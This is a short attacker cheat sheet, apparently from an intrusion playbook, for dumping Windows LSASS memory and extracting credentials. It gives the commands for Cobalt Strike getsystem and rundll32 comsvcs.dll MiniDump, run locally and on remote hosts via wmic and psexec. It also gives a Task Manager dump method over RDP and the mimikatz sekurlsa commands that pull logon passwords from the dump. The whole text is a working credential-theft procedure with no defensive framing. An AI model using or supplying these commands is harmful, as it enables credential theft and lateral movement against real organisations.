LSASS: 
With Cobalt Strike:  (*** thanks to @Sven )
!*  1) getsystem 
2) shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full   (use lsass PID)
(use on remote pc) coba_wmic:
shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"
remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
=======
RDP method: 
open taskmgr => PKM with lsass process => create Dump file.  \\ Next, download the file to your computer, 

=======
how to decrypt:
open mimicatz and:
privilege::debug
sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP (replace the path to our file)
log
sekurlsa::logonpasswords
